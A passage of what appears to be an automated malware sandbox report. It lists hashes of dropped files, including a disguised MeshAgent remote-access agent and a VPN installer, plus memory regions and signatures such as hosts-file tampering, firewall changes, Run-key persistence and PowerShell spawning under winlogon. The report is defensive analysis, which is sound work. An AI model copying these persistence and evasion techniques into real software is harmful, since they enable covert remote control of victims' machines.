| SHA256 | 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32 |
| SHA512 | c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-json-ext.jar
| MD5 | fde38932b12fc063451af6613d4470cc |
| SHA1 | bc08c114681a3afc05fb8c0470776c3eae2eefeb |
| SHA256 | 9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830 |
| SHA512 | 0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839 |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-runtime.jar
| MD5 | d5ef47c915bef65a63d364f5cf7cd467 |
| SHA1 | f711f3846e144dddbfb31597c0c165ba8adf8d6b |
| SHA256 | 9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6 |
| SHA512 | 04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\jfxrt.jar
| MD5 | 042b3675517d6a637b95014523b1fd7d |
| SHA1 | 82161caf5f0a4112686e4889a9e207c7ba62a880 |
| SHA256 | a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22 |
| SHA512 | 7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35 |
memory/2332-311-0x00000000029B0000-0x00000000029B1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-xml-ext.jar
| MD5 | 0a79304556a1289aa9e6213f574f3b08 |
| SHA1 | 7ee3bde3b1777bf65d4f62ce33295556223a26cd |
| SHA256 | 434e57fffc7df0b725c1d95cabafdcdb83858ccb3e5e728a74d3cf33a0ca9c79 |
| SHA512 | 1560703d0c162d73c99cef9e8ddc050362e45209cc8dea6a34a49e2b6f99aae462eae27ba026bdb29433952b6696896bb96998a0f6ac0a3c1dbbb2f6ebc26a7e |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-zend-ext.jar
| MD5 | 4bc2aea7281e27bc91566377d0ed1897 |
| SHA1 | d02d897e8a8aca58e3635c009a16d595a5649d44 |
| SHA256 | 4aef566bbf3f0b56769a0c45275ebbf7894e9ddb54430c9db2874124b7cea288 |
| SHA512 | da35bb2f67bca7527dc94e5a99a162180b2701ddca2c688d9e0be69876aca7c48f192d0f03d431ccd2d8eec55e0e681322b4f15eba4db29ef5557316e8e51e10 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\currency.data
| MD5 | f6258230b51220609a60aa6ba70d68f3 |
| SHA1 | b5b95dd1ddcd3a433db14976e3b7f92664043536 |
| SHA256 | 22458853da2415f7775652a7f57bb6665f83a9ae9fb8bd3cf05e29aac24c8441 |
| SHA512 | b2dfcfdebf9596f2bb05f021a24335f1eb2a094dca02b2d7dd1b7c871d5eecda7d50da7943b9f85edb5e92d9be6b6adfd24673ce816df3960e4d68c7f894563f |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-zip-ext.jar
| MD5 | 20f6f88989e806d23c29686b090f6190 |
| SHA1 | 1fdb9a66bb5ca587c05d3159829a8780bb66c87d |
| SHA256 | 9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16 |
| SHA512 | 2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea |
C:\Users\Admin\AppData\Roaming\Installer\lib\slf4j-api.jar
| MD5 | caafe376afb7086dcbee79f780394ca3 |
| SHA1 | da76ca59f6a57ee3102f8f9bd9cee742973efa8a |
| SHA256 | 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79 |
| SHA512 | 5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b |
C:\Users\Admin\AppData\Roaming\Installer\lib\zt-zip.jar
| MD5 | 0fd8bc4f0f2e37feb1efc474d037af55 |
| SHA1 | add8fface4c1936787eb4bffe4ea944a13467d53 |
| SHA256 | 1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b |
| SHA512 | 29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149 |
C:\Users\Admin\AppData\Roaming\Installer\lib\slf4j-simple.jar
| MD5 | 722bb90689aecc523e3fe317e1f0984b |
| SHA1 | 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e |
| SHA256 | 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874 |
| SHA512 | d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\security\java.security
| MD5 | 409c132fe4ea4abe9e5eb5a48a385b61 |
| SHA1 | 446d68298be43eb657934552d656fa9ae240f2a2 |
| SHA256 | 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583 |
| SHA512 | 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\jsse.jar
| MD5 | fd1434c81219c385f30b07e33cef9f30 |
| SHA1 | 0b5ee897864c8605ef69f66dfe1e15729cfcbc59 |
| SHA256 | bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5 |
| SHA512 | 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\net.dll
| MD5 | 691b937a898271ee2cffab20518b310b |
| SHA1 | abedfcd32c3022326bc593ab392dea433fcf667c |
| SHA256 | 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61 |
| SHA512 | 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\nio.dll
| MD5 | 95edb3cb2e2333c146a4dd489ce67cbd |
| SHA1 | 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a |
| SHA256 | 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31 |
| SHA512 | ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\tzdb.dat
| MD5 | 5a7f416bd764e4a0c2deb976b1d04b7b |
| SHA1 | e12754541a58d7687deda517cdda14b897ff4400 |
| SHA256 | a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d |
| SHA512 | 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\tzmappings
| MD5 | b8dd8953b143685b5e91abeb13ff24f0 |
| SHA1 | b5ceb39061fce39bb9d7a0176049a6e2600c419c |
| SHA256 | 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272 |
| SHA512 | c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\resources.jar
| MD5 | 9a084b91667e7437574236cd27b7c688 |
| SHA1 | d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1 |
| SHA256 | a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d |
| SHA512 | d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcp120.dll
| MD5 | fd5cabbe52272bd76007b68186ebaf00 |
| SHA1 | efd1e306c1092c17f6944cc6bf9a1bfad4d14613 |
| SHA256 | 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608 |
| SHA512 | 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr120.dll
| MD5 | 034ccadc1c073e4216e9466b720f9849 |
| SHA1 | f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1 |
| SHA256 | 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f |
| SHA512 | 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\prism_d3d.dll
| MD5 | 5aadadf700c7771f208dda7ce60de120 |
| SHA1 | e9cf7e7d1790dc63a58106c416944fd6717363a5 |
| SHA256 | 89dac9792c884b70055566564aa12a8626c3aa127a89303730e66aba3c045f79 |
| SHA512 | 624431a908c2a835f980391a869623ee1fa1f5a1a41f3ee08040e6395b8c11734f76fe401c4b9415f2055e46f60a7f9f2ac0a674604e5743ab8301dbadf279f2 |
memory/2332-367-0x00000000029B0000-0x00000000029B1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\glass.dll
| MD5 | 434cbb561d7f326bbeffa2271ecc1446 |
| SHA1 | 3d9639f6da2bc8ac5a536c150474b659d0177207 |
| SHA256 | 1edd9022c10c27bbba2ad843310458edaead37a9767c6fc8fddaaf1adfcbc143 |
| SHA512 | 9e37b985ecf0b2fef262f183c1cd26d437c8c7be97aa4ec4cd8c75c044336cc69a56a4614ea6d33dc252fe0da8e1bbadc193ff61b87be5dce6610525f321b6dc |
memory/2332-373-0x00000000029B0000-0x00000000029B1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javafx_font.dll
| MD5 | aeada06201bb8f5416d5f934aaa29c87 |
| SHA1 | 35bb59febe946fb869e5da6500ab3c32985d3930 |
| SHA256 | f8f0b1e283fd94bd87abca162e41afb36da219386b87b0f6a7e880e99073bda3 |
| SHA512 | 89bad9d1115d030b98e49469275872fff52d8e394fe3f240282696cf31bccf0b87ff5a0e9a697a05befcfe9b24772d65ed73c5dbd168eed111700caad5808a78 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\awt.dll
| MD5 | 159ccf1200c422ced5407fed35f7e37d |
| SHA1 | 177a216b71c9902e254c0a9908fcb46e8d5801a9 |
| SHA256 | 30eb581c99c8bcbc54012aa5e6084b6ef4fcee5d9968e9cc51f5734449e1ff49 |
| SHA512 | ab3f4e3851313391b5b8055e4d526963c38c4403fa74fb70750cc6a2d5108e63a0e600978fa14a7201c48e1afd718a1c6823d091c90d77b17562b7a4c8c40365 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\accessibility.properties
| MD5 | 9e5e954bc0e625a69a0a430e80dcf724 |
| SHA1 | c29c1f37a2148b50a343db1a4aa9eb0512f80749 |
| SHA256 | a46372b05ce9f40f5d5a775c90d7aa60687cd91aaa7374c499f0221229bf344e |
| SHA512 | 18a8277a872fb9e070a1980eee3ddd096ed0bba755db9b57409983c1d5a860e9cbd3b67e66ff47852fe12324b84d4984e2f13859f65fabe2ff175725898f1b67 |
memory/2332-394-0x00000000029B0000-0x00000000029B1000-memory.dmp
memory/2332-417-0x00000000029B0000-0x00000000029B1000-memory.dmp
memory/5080-418-0x0000000000400000-0x00000000004F2000-memory.dmp
memory/4768-421-0x0000000000400000-0x000000000072E000-memory.dmp
memory/4420-424-0x000002652D9E0000-0x000002652DA02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gtua52nc.trd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2272-439-0x0000000140000000-0x000000014002B000-memory.dmp
memory/2272-442-0x0000000140000000-0x000000014002B000-memory.dmp
memory/2272-438-0x0000000140000000-0x000000014002B000-memory.dmp
memory/2272-437-0x0000000140000000-0x000000014002B000-memory.dmp
memory/2272-440-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1592-471-0x0000021E36020000-0x0000021E3603C000-memory.dmp
memory/1592-472-0x0000021E36E00000-0x0000021E36EB5000-memory.dmp
memory/1592-473-0x0000021E36010000-0x0000021E3601A000-memory.dmp
memory/2332-474-0x00000000029B0000-0x00000000029B1000-memory.dmp
memory/1592-475-0x0000021E36060000-0x0000021E3607C000-memory.dmp
memory/1592-476-0x0000021E36040000-0x0000021E3604A000-memory.dmp
memory/1592-477-0x0000021E37020000-0x0000021E3703A000-memory.dmp
memory/1592-478-0x0000021E36050000-0x0000021E36058000-memory.dmp
memory/1592-479-0x0000021E37000000-0x0000021E37006000-memory.dmp
memory/1592-480-0x0000021E37010000-0x0000021E3701A000-memory.dmp
memory/1552-493-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1552-499-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3636-505-0x000001E51E2D0000-0x000001E51E2F0000-memory.dmp
memory/3636-504-0x0000000140000000-0x0000000140835000-memory.dmp
memory/3636-506-0x0000000140000000-0x0000000140835000-memory.dmp
memory/3636-503-0x0000000140000000-0x0000000140835000-memory.dmp
memory/3636-500-0x0000000140000000-0x0000000140835000-memory.dmp
memory/3636-497-0x0000000140000000-0x0000000140835000-memory.dmp
memory/3636-502-0x0000000140000000-0x0000000140835000-memory.dmp
memory/3636-498-0x0000000140000000-0x0000000140835000-memory.dmp
memory/3636-501-0x0000000140000000-0x0000000140835000-memory.dmp
memory/1552-492-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1552-491-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1552-490-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1552-489-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1160-520-0x00000267A2960000-0x00000267A298A000-memory.dmp
memory/2628-1343-0x0000000002DB0000-0x0000000002DE6000-memory.dmp
memory/2628-1347-0x0000000005580000-0x0000000005BA8000-memory.dmp
memory/2628-1383-0x00000000054A0000-0x00000000054C2000-memory.dmp
memory/2628-1385-0x0000000006680000-0x00000000066E6000-memory.dmp
memory/2628-1384-0x0000000006610000-0x0000000006676000-memory.dmp
memory/2628-1387-0x00000000067F0000-0x0000000006B44000-memory.dmp
memory/2628-1418-0x0000000006DC0000-0x0000000006DDE000-memory.dmp
memory/2628-1419-0x0000000006E10000-0x0000000006E5C000-memory.dmp
memory/2628-1442-0x00000000085E0000-0x0000000008C5A000-memory.dmp
memory/2628-1443-0x0000000007300000-0x000000000731A000-memory.dmp
memory/2628-1453-0x000000006E060000-0x000000006E0AC000-memory.dmp
memory/2628-1452-0x0000000007E30000-0x0000000007E62000-memory.dmp
memory/2628-1463-0x0000000007E10000-0x0000000007E2E000-memory.dmp
memory/2628-1465-0x0000000007E80000-0x0000000007F23000-memory.dmp
memory/2628-1469-0x00000000081A0000-0x00000000081AA000-memory.dmp
memory/2628-1476-0x00000000083C0000-0x0000000008456000-memory.dmp
memory/2628-1480-0x0000000008320000-0x0000000008331000-memory.dmp
memory/2628-1491-0x0000000008360000-0x000000000836E000-memory.dmp
memory/2628-1495-0x0000000008370000-0x0000000008384000-memory.dmp
memory/2628-1497-0x0000000008460000-0x000000000847A000-memory.dmp
memory/2628-1499-0x00000000083A0000-0x00000000083A8000-memory.dmp
memory/4744-1925-0x0000000004D60000-0x0000000004DFC000-memory.dmp
memory/4744-1923-0x0000000000010000-0x0000000000304000-memory.dmp
memory/1424-2077-0x000000006E060000-0x000000006E0AC000-memory.dmp
memory/1424-2087-0x00000000079F0000-0x0000000007A93000-memory.dmp
memory/1424-2088-0x0000000007C70000-0x0000000007C81000-memory.dmp
memory/1424-2121-0x0000000007CB0000-0x0000000007CC4000-memory.dmp
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
| MD5 | 8f6bdd924c4d71face7dfc18d8be238d |
| SHA1 | 6857920fec8ecc23598ccf32e771ab1de54d42d1 |
| SHA256 | a3253d12ea807240cbb41a7d6e5d97d1e29a01d695a81dba6c1278e95a84652f |
| SHA512 | fa42b996be7deb1dbaa304df81f30264f00b886d4dc2ed44dc5467f8f7d6badd72fcd5cfc3f5add4e377f4e9376bca3295e6a08f9fb02eb66376100e67353594 |
C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.ba\logo.png
| MD5 | d6bd210f227442b3362493d046cea233 |
| SHA1 | ff286ac8370fc655aea0ef35e9cf0bfcb6d698de |
| SHA256 | 335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef |
| SHA512 | 464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b |
C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.be\VC_redist.x64.exe
| MD5 | 35e545dac78234e4040a99cbb53000ac |
| SHA1 | ae674cc167601bd94e12d7ae190156e2c8913dc5 |
| SHA256 | 9a6c005e1a71e11617f87ede695af32baac8a2056f11031941df18b23c4eeba6 |
| SHA512 | bd984c20f59674d1c54ca19785f54f937f89661014573c5966e5f196f776ae38f1fc9a7f3b68c5bc9bf0784adc5c381f8083f2aecdef620965aeda9ecba504f3 |
memory/3128-3182-0x00000000070F0000-0x0000000007112000-memory.dmp
memory/3128-3183-0x0000000009360000-0x0000000009904000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe
| MD5 | 546157d9f4974c5b9871be88d6814a3e |
| SHA1 | 8fa936396bca1454aa4bb8f8767394ca25763383 |
| SHA256 | c9fb879ceee5d354d2f773a565f7a537cb71733ea79dce8763a819774c64304c |
| SHA512 | 8369d845ecd5670abc2d257e9a794bf59c771f1496b8ae6a74d0987c25152483cf0ca15710bbf087c6aa816700b6a8774e4dd7744b91256e2f54094b65271117 |
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\13C4F398AEEF2B370776B45F5DB2E95CCE7C094E
| MD5 | 8e700c831a96ff729fd8fc3f609c7693 |
| SHA1 | baed43d983604766b06a4896e14ccda703826783 |
| SHA256 | b7c78710824c72d0a2c479c8e1c0490ced970647991f40a0fde2529b8958a51e |
| SHA512 | c682ca7b96ca42e65bf18224e84db036a8a25353967b9fd934f928b4ef26817e206b4f0c180da0dfb79899fd2cdffe9be45cc1e3c3caa8090ec629b12d005486 |
C:\ProgramData\Microsoft\Crypto\SystemKeys\8b4bb76343abb41b06ce4b46a614f4e1_4304acb9-c3f6-452a-9860-eb4e85d38d4e
| MD5 | 61ad6346b35b29da4699046a79048e3f |
| SHA1 | ff1ff3ceb986c672b9f121facedc251fdd2793b8 |
| SHA256 | 9190ba3b6be432795c17f3bc849010cd24401302cdba8c2de253c8e067a37a01 |
| SHA512 | c85eddcb0652f3656306d240dceb2c0a5071a302c83f67785db784c8dee4976b83bb63a799679f08b012cd5abded549180bf087974c94cb73d8fc7cb9bdd2f5e |
memory/4744-3499-0x00000000050D0000-0x0000000005260000-memory.dmp
memory/4744-3503-0x0000000002AF0000-0x0000000002B12000-memory.dmp
C:\Windows\Installer\e58fe34.msi
| MD5 | a4075b745d8e506c48581c4a99ec78aa |
| SHA1 | 389e8b1dbeebdff749834b63ae06644c30feac84 |
| SHA256 | ee130110a29393dcbc7be1f26106d68b629afd2544b91e6caf3a50069a979b93 |
| SHA512 | 0b980f397972bfc55e30c06e6e98e07b474e963832b76cdb48717e6772d0348f99c79d91ea0b4944fe0181ad5d6701d9527e2ee62c14123f1f232c1da977cada |
C:\Config.Msi\e58fe27.rbs
| MD5 | aafdcc2c4f09717f6b773d7af993904e |
| SHA1 | a247cf26672b48903d7d0370a2b90e7772f8621e |
| SHA256 | d0ddf67edecaac4b561b6f32930874f43fbfd970fffa5dc4603f6f8b59783975 |
| SHA512 | 8d5b9fdf0f8e585bd21c99a3d68e15e6b41289b16a14cb695c80dd1fba0337d8b0f7680102a81d4270896863b40f9940e152ebed5539bc5428af5205b8a33956 |
C:\Config.Msi\e58fe33.rbs
| MD5 | 100c849cdc63cde5c751a18238e27647 |
| SHA1 | 06e2c9fbb86de906d37ed3828751dfe60b031156 |
| SHA256 | fb7c5004b619b4e9bc38c86f385fee3d8b3d3fe44fee452ecb0a4429e5d78373 |
| SHA512 | 201b8106e9bc59544ff95d7c270cbe93b47ae4f6b32e9f3db370336b9d4ae46b5c1e76d0a6ad52bc906bbb195aa8c09bbbc1854ae6d0ce3d2eb84e686805790d |
C:\Config.Msi\e58fe49.rbs
| MD5 | 3eb466fe55c6935d82bb6cc2825ae7ba |
| SHA1 | 4c4c02dc37ac0d671943e0dcd15aabd5e1749bda |
| SHA256 | c36956cf42492529eb28cfa627286ce1b7f8d38d5a99344d34a1d371d32b4492 |
| SHA512 | 03176d586c8457df13b8a34dc2528a1520dc142186a278bda2fb77022b0417064d83eeceab9a80eaf8bf594319652ac6b559328de876b6829718e6684db40868 |
C:\Config.Msi\e58fe3a.rbs
| MD5 | 38d63209b5c9c1e1d2fdad1bf0dc1692 |
| SHA1 | bbbdf72f4e16c8f013a3723ce801c2bab06925da |
| SHA256 | 19a244b9e2a5f1dcc2957e79240cc402abbaa3cd57bca351d9507c6c5811958e |
| SHA512 | 0b5a8458b5295b2b22d5d1b1c254443c187b83138a6793c35d6015a52643841925f1dbed9f9c7f36ca80d533da7b98bf2b8616fc448d94f48d9cc182ef757d8a |
C:\Windows\Temp\{70883114-65DC-4AAB-8FD5-6201EA639DA1}\.ba\wixstdba.dll
| MD5 | eab9caf4277829abdf6223ec1efa0edd |
| SHA1 | 74862ecf349a9bedd32699f2a7a4e00b4727543d |
| SHA256 | a4efbdb2ce55788ffe92a244cb775efd475526ef5b61ad78de2bcdfaddac7041 |
| SHA512 | 45b15ade68e0a90ea7300aeb6dca9bc9e347a63dba5ce72a635957564d1bdf0b1584a5e34191916498850fc7b3b7ecfbcbfcb246b39dbf59d47f66bc825c6fd2 |
C:\Users\Admin\AppData\Local\Temp\{f22e1a6f-710a-5048-bd80-6329e477a3ab}\tap0901.sys
| MD5 | c10ccdec5d7af458e726a51bb3cdc732 |
| SHA1 | 0553aab8c2106abb4120353360d747b0a2b4c94f |
| SHA256 | 589c5667b1602837205da8ea8e92fe13f8c36048b293df931c99b39641052253 |
| SHA512 | 7437c12ae5b31e389de3053a55996e7a0d30689c6e0d10bde28f1fbf55cee42e65aa441b7b82448334e725c0899384dee2645ce5c311f3a3cfc68e42ad046981 |
C:\Users\Admin\AppData\Local\Temp\{f22e1a6f-710a-5048-bd80-6329e477a3ab}\tap0901.cat
| MD5 | f73ac62e8df97faf3fc8d83e7f71bf3f |
| SHA1 | 619a6e8f7a9803a4c71f73060649903606beaf4e |
| SHA256 | cc74cdb88c198eb00aef4caa20bf1fda9256917713a916e6b94435cd4dcb7f7b |
| SHA512 | f81f5757e0e449ad66a632299bcbe268ed02df61333a304dccafb76b2ad26baf1a09e7f837762ee4780afb47d90a09bf07cb5b8b519c6fb231b54fa4fbe17ffe |
C:\Users\Admin\AppData\Local\Temp\{f22e1a6f-710a-5048-bd80-6329e477a3ab}\oemvista.inf
| MD5 | 26009f092ba352c1a64322268b47e0e3 |
| SHA1 | e1b2220cd8dcaef6f7411a527705bd90a5922099 |
| SHA256 | 150ef8eb07532146f833dc020c02238161043260b8a565c3cfcb2365bad980d9 |
| SHA512 | c18111982ca233a7fc5d1e893f9bd8a3ed739756a47651e0638debb0704066af6b25942c7961cdeedf953a206eb159fe50e0e10055c40b68eb0d22f6064bb363 |
C:\Windows\Temp\UDD27D4.tmp
| MD5 | 16098bfa3cc9dcb626d6ef93e682d524 |
| SHA1 | 8e49f6c59a2194a578547f2c395ce5f6c2e88ab0 |
| SHA256 | 7ef7c1e13a674b8b12177302947bf9682939806877fbbe9c135bc5e99f2e0f0f |
| SHA512 | ec90f56742f7c0154afe67faeff2606e53bbb605a333ee9dbe93ffbe8cd39da8e6922eadd2896df48db91a39cd8628425b3353efa7a8c95c10c606eb1ea3a6c3 |
C:\Windows\rescache\_merged\1910676589\260453855.pri
| MD5 | 58e92d51631f0c0fcaa99356878a7737 |
| SHA1 | 107bd47d634e062c90ef4ecf7f6c93cba9919da3 |
| SHA256 | eb5e6e1d8a29cf99d4bd6808776e0b84e7104a521812a38cb927b174b0bb6ad5 |
| SHA512 | 1c58f843faa3532b8cb24d5db928a01c180e4e1e63b02f7509e185d0e53238dbaaac63cbdd6f769375afce3ac0b9d646b4709b036fce3320ca04701604eda71f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-14 17:53
Reported
2024-10-14 17:55
Platform
win11-20241007-en
Max time kernel
69s
Max time network
86s
Command Line
Signatures
Detects MeshAgent payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MeshAgent
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4676 created 636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Stops running service(s)
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{8bdfe669-9705-4184-9368-db9ce581e0e7} = "\"C:\\ProgramData\\Package Cache\\{8bdfe669-9705-4184-9368-db9ce581e0e7}\\VC_redist.x64.exe\" /burn.runonce" | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
